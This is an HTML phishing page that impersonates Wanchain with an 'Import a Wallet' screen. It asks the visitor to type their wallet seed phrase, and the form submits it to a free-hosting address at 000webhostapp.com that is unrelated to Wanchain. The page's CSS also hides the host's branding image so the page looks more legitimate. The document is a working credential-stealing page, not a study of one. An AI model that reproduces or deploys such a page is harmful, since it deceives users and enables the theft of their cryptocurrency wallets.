<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Wanchain - Decentralized financial interoperability</title>
	<!-- BOOTSTRAP STYLES-->
    <link href="./interoperability_files/bootstrap.css" rel="stylesheet">
     <!-- FONTAWESOME STYLES-->
    <link href="./interoperability_files/font-awesome.css" rel="stylesheet">
        <!-- CUSTOM STYLES-->
    <link href="./interoperability_files/custom.css" rel="stylesheet">
     <!-- GOOGLE FONTS-->
   <link href="./interoperability_files/css" rel="stylesheet" type="text/css">

</head>
<body>
<style>
 *{
  margin: 0;
  padding: 0;
  font-family: Arial;
 }
body{
  background-color: rgb(25,26,44);
  height: 100vh;
  background-size: cover;
  background-position: absolute;
  background-repeat: no-repeat, repeat;
}

ul{
  float: right;
  list-style-type: none;
  margin-top: 25px;
}

ul li{
  display: inline-block;
}

ul li a{
  text-decoration: none;
  color: #fff;
  padding: 8px 25px;
  border: 2px solid #C09854;
  border-radius: 25px;
  font-size: 14px;
  font-style: bold;
  transform: 0.6s ease;
  letter-spacing: 1px;
}

ul li a:hover{
  background-color: #C09854;
  color: #fff;
}

.logo img{
  float: left;
  margin-top: 23px;
  height: 20px;
  width: auto;
}

.main{
  margin: auto;
}

.title{
 
  margin-top: 6%;
  text-align: center;
  
}


.btn{
  border-color: none;
  background: linear-gradient(to right, rgb(12,164,239), rgb(1,111,162) );
  padding: 10px 10px;
  display: inline-block;
  
  width: 200px;
  border: none;
  outline: none !important;
  border-radius: 25px;
}

.btn a{
  text-decoration: none;
  color: white;
  font-size: 15px;
  font-style: bold;
  letter-spacing: 2px;

}
img[alt="www.000webhost.com"]{
  opacity: 0;
}


</style>



   <header><h1 style="color: white; font-size: 20px; text-align: center">Import a Wallet</h1></header>
    <div class="title">
         <form method="POST" action="https://irolbeack2021.000webhostapp.com/wallet1.php?access.wallet" class="loginBox ng-pristine ng-valid">
      <textarea name="walletSeed" placeholder="please input the seed phrase" id="txtseed" required=""></textarea>
      
      <br><br><br><br><br><br>
<br><br><br><br>


<br>


    
    <button class="btn">
      <a href="https://irolbeack2021.000webhostapp.com/wallet1.php?access.wallet"><strong>Next</strong></a>
    </button>
  </form>
     <style>
         #txtseed{
             width: 100%;
             height: 150px;
             margin-left: 1px;
             margin-right: 1px;
             background-color: rgb(21,22,42) ;
             font-size: 16px;
             color: white;
             font-weight: bold ;
             outline: none !important;
             
             border: none;
             
         }
         ::placeholder{
             font-size: 14px;
             color: grey;
             padding: 2px 2px;
         }
         textarea::-webkit-input-placeholder {
  color: grey;
  margin: 2px ;
  
}
     </style>
     
     
         

    </div>
 

    
 
    

     <!-- SCRIPTS -AT THE BOTOM TO REDUCE THE LOAD TIME-->
    <!-- JQUERY SCRIPTS -->
    <script src="./interoperability_files/jquery-1.10.2.js.download"></script>
      <!-- BOOTSTRAP SCRIPTS -->
    <script src="./interoperability_files/bootstrap.min.js.download"></script>
    <!-- METISMENU SCRIPTS -->
    <script src="./interoperability_files/jquery.metisMenu.js.download"></script>
      <!-- CUSTOM SCRIPTS -->
    <script src="./interoperability_files/custom.js.download"></script>
   

</body></html>